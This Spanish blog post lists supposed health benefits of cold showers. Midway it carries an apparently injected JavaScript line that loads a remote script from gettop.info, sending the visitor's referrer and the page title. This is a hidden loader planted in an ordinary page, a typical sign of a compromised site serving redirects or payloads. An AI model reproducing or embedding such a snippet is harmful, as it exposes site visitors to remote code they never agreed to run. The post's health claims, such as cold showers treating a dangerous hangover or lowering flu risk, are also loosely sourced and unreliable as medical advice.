Salud y belleza » Bienestar

Para la salud, una ducha de agua fría

Sin Comentarios

La famosa ducha de agua fría suele tener varias connotaciones. Por ejemplo, es un sólido recurso al momento de intentar recuperar la conciencia o, porque no, una alternativa para curar la resaca -sobre todo cuando ésta se ha vuelto peligrosa-.

Pero más allá de todo esto, existen un conjunto de beneficios casi desconocidos en torno a la ducha de agua fría. Aquí, te los presentamos…

  • Está comprobado que una ducha fría ayuda a activar la circulación. Muchas personas con problemas de esa índole, suelen darse una ducha fría por la mañana y otra por la tarde. Vale decir que éstas duchas frías deben ser bajo conciencia: rápidas y tomando recaudos (especialmente la gente de edad mayor).
  • Los deportistas, luego de una dura jornada de entrenamiento, también deberían de darse una ducha relámpago con agua fría. Esto ayuda a evitar lesiones pues el cuerpo se relaja y se deshincha. Muchos futbolistas aseguran que, incluso, durante el entretiempo de los partidos, en esos quince minutos libres, se dan una ducha de agua fría para salir más preparados el segundo tiempo.
  • Puede resultar irónico pero algunas especialistas aseguran que las personas que se ducha con agua fría tienen menos predisposición a contraer gripe que esos otros que se bañan con agua caliente o tibia. Al parecer las reacciones del cuerpo, luego, al salir a la calle y pescar cualquier brisa, serían opuestas.

if (document.currentScript) { s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.